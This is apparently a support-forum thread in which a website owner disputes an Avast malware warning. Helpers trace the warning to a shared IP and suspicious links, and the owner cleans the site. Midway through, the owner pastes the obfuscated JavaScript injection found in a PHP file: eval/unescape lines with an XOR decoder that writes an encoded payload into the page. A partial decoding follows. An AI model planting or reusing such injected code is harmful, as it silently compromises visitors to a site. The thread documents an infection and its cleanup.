your soft say my site is infected, but it's not true, i lost money men!

hi, i’ve sign up cause
i hv a problem my users say their antivirus “AVAST” say site http://anonypaste.co is infected
but it’s not true… in my opinion html code is clean please someone check the same cause i lost users and money for avast mistake.

otherwise please provide me malicious code cause i really can get any manipulation in the software ok???

i hope u can help and fix ASAP please!!!

hv nice day.

and what is it avast say?..you may attach screenshot of avast warning

show this:

http://img2.picload.org/image/awolarp/proof.png

URL:mal means it is on a blacklist…for whatever reason

if you think this is wrong, report it here http://www.avast.com/contact-form.php
you may add a link to this topic in case they reply here

thx you
i ve made the request…
my site it’s in a black list, funny. i would like to know who’s the admin of this blacklist “for any reason”

thx for ur help i wait …for other help

I guess it is not your domain, but it is rather the same IP that is being blocked.
Reason could be phishing and this url is on the Phishwatch blocklist:
Up(nil): 108.162.197.18 to 108.162.196.18 br-2passosdoparaiso dot com htxp://www.cielo.br-2passosdoparaiso.com/Principal/index.html
There is also another malware launching site sharing that same IP: http://urlquery.net/report.php?id=709393
Ask your hoster why you share an IP with bad web rep, phishing or malicious domains!

polonus

sure problem is host? i can change my domains NS with one click, now i verify this. i protect my websites with cloudflare really funny they have host in black list. thx for explain. now i can say my users they can come to read here.

Hi webm4st,

You are welcome, thanks for reporting here.
What is allowed on that malsite, see: http://urlquery.net/report.php?id=709393
IDS alert for FILE-IMAGE libpng chunk decompression integer overflow attempt
Impact of this vulnerability

By causing libpng to process a specially-crafted PNG file (e.g. by visiting a web page, viewing an email, or opening a document), a remote, unauthenticated attacker may be able to execute arbitrary code with the privileges of the application that uses libpng.

quote taken from this link: https://www.kb.cert.org/vuls/id/523889

polonus

yes i ve contact cloudflare support to show this link and their server status shows on your links, maybe can fix their problme

otherwise,you say i simply need to change dns host to remove avast alert right? thx again

hv nice day!

Hello,
this is not a problem of hosting but we found suspicious links at your site: anonypaste.co/qq3ufz84
This is a mark of infection,

Regards,
Jan Sirmer

this is not a problem of hosting but we found suspicious links at your site: [b]anonypaste.co/qq3ufz84[/b]
urlquery report http://urlquery.net/report.php?id=3111537

see under Intrusion Detection Systems - Suricata /w Emerging Threats Pro

hi thx for replies boys, is not the host, but the code… in link u hv pasted i can see javascript manipualtion…

i found script manipulation in php file and i ve removed the malicious java:
suspicious code:


eval(unescape('%66%75%6e%63%74%69%6f%6e%20%6e%66%63%33%66%65%30%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%32%33%31%36%35%32%31%34%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%37%35%36%33%30%31%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%2d%36%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%6e%66%63%33%66%65%30%28%27') + '%47%6c%7c%78%71%23%60%6e%7f%69%76%74%42%2d%28%2f%73%69%7f%69%72%6f%45%2b%76%74%7c%7a%21%44%11%15%45%6e%6e%72%79%6b%79%41%42%61%78%46%47%69%3f%41%48%58%53%46%51%26%55%4b%5a%4a%4b%48%4c%41%59%4f%54%51%42%3c%6e%3a%41%45%6f%7d%42%10%10%43%6a%74%7f%7b%78%23%7d%78%73%6d%40%28%78%7e%68%7a%6f%78%2d%21%73%62%75%68%43%29%62%74%7c%74%7d%2d%21%7b%62%74%78%6b%42%2d%49%5b%4f%4b%54%21%49%4e%5e%48%26%5b%50%26%51%4b%45%4f%21%5d%4b%49%5a%26%57%42%59%53%4b%2a%41%14%17%47%33%6f%75%79%76%44%4b%68%7a%41%45%32%6c%6d%77%7a%6a%7d%44%4b%68%7a%4123165214%35%30%39%30%32%35%37' + unescape('%27%29%29%3b'));

decoded is


eval(unescape('function nfc3fe0(s) {
	var r = "";
	var tmp = s.split("23165214");
	s = unescape(tmp[0]);
	k = unescape(tmp[1] + "756301");
	for( var i = 0; i < s.length; i++) {
		r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+-6);
	}
	return r;
}
'));
eval(unescape('document.write(nfc3fe0('') + 'Gl|xq#`nivtB-(/siiroE+vt|z!DEnnrykyABaxFGi?AHXSFQ&UKZJKHLAYOTQB<n:AEo}BCjt{x#}xsm@(x~hzox-!sbuhC)bt|t}-!{btxkB-I[OKT!IN^H&[P&QKEO!]KIZ&WBYSK*AG3ouyvDKhzAE2lmwzj}DKhzA231652145090257' + unescape(''));'));

i ve removed please someone can check the same ??

thx for support!

edit:

i 'm debugging all my sites, i post here ASAP to update my situation and solve my troubles ok?
thx again!

hi, finally i hv fiz problem… i hope…

i’ve replace all java scripts and more php code… well i can say only THX YOU AVAST

i ve made some check:
http://urlquery.net/report.php?id=3119710
http://urlquery.net/report.php?id=3119716

we can see check show: “no alerts detected”
please check the same :slight_smile:
avast database is updated every days? yes? i hv to wait little time and my sites will be delete at soon as possible right?

thx again for your support

hv nice day!!